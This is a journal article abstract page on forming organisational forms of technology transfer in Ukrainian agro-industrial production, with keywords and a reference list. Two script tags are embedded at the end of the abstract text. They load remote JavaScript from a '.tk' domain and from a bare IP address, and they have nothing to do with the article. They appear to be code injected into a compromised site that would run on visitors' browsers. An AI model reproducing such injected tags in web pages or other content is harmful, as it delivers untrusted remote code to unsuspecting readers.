ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 658.149.3:631.153.7
Інноваційна діяльність та інтелектуальний капітал

Формирование организационных форм трансфера технологий в агропромышленном произ­водстве / Тывончук С.А. // Экономика АПК. - 2013. - № 2 - С. 93

Изложена характеристика объектов интеллектуальных прав, результаты трансфера технологий в агропромышленном производстве и организационные формы трансфера технологий научных учреждений НААН. Выявлено, что в аграрном секторе экономики Украины организационные формы трансфера технологий находятся в стадии становления. В научных учреждениях НААН, у которых функционируют такие структуры на 1 гри выделенных государственных финансовых средств, получают от коммерциализации инноваций около 2 гри и более (в целом по системе научных учреждений от коммерциализации инноваций получено на 1 выделенных государственных финансовых ресурсов только 0,28 гри).Сформулированы основные методические подходы к формированию организационных форм трансфера технологий в агропромышленном производстве. Табл.: 2. Илл.: 3. Библиогр.: 13.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключевые слова: инновация, инновационный продукт, интеллектуальная собственность, инжиниринг, лицензия, трансфер, технология, кластер, коммерциализация, патент, франчайзинг

Список использованных источников

 1. Володій С.А. Інноваційний розвиток аграрної науки [моногр.]. / С.А. Володін. - К.: Вид-во МАУП, 2006. - 400 с.
 2. ГеєцьВ.М. Інноваційні перспективи України / В.М. Геєць, В.П. Семиноженко. - Харків: Константа, 2006. - 272 с.
 3. ДрукерП. Як забезпечити успіх у бізнесі: новаторство і підприємництво / П. Друкер. - К., 1994.
 4. Закон України «Про охорону прав на винаходи і корисні моделі» № 3687-ХІІ від 15.12.1993 р. [Електронний ресурс] / Законодавство України. - Режим доступу: http://zakon.rada.gov.ua.
 5. Звіт про діяльність Національної академії аграрних наук України за 2011 рік. - К: Аграрна наука, 2012.
 6. Кириченко В.В. Методологія трансферу інновацій в агропромислове виробництво / [Електронний ресурс] / В.В. Кириченко. - Режим досту пу: http://www.nbuv.gov.ua/p ortal/Soc_Gum/inek/2011_7/28.pdf.
 7. Музика П.М. Інноваційне підприємництво в аграрному виробництві України: моногр. / П. М. Музика. - Львів: ПП « Кварт», 2005. - 306 с.
 8. Підопригора О. Авторське право і суміжні права в новому Цивільному кодексі України / О. Підпригора // Інтелектуальна власність. - 2004. - № 2. - C. 16-20.
 9. Інноваційна діяльність в аграрній сфері: інституціональний аспект: моногр. / [П.Т.Саблук, О.Г. Шпикуляк, Л.І. Курило та ін.]. - К.: ННЦ ІАЕ, 2010. - 706 с.
 10. Стеченко Д.М. Інноваційні форми регіонального розвитку: навч. посіб. / Д.М. Стеченко. - К.: Вища шк., 2002.
 11. Соколов ВМ. Стан та основні підходи поліпшення системи збору роялті за використання інтелектуальної власності наукових уста¬нов / [Електронний ресурс]. В. М. Соколов. - Режим доступу: http://www.nbuv.gov.ua/institutions/sgi/sokolov.htlm.
 12. Шпикуляк О.Г. Трансфер технологій в агропромисловому виробництві України (стан і концептуальні напрями) / О. Г. Шпикуляк, С.О. Тивончук, С.В. Тивончук // Економіка АПК. - 2012. - № 10. - С. 111-114.
 13. ШумпетерЙ. Теория экономического развития / И. Шумпетер. - М.: Прогресс, 1982. - 454 с.
Читать статью: 13_02_16.pdf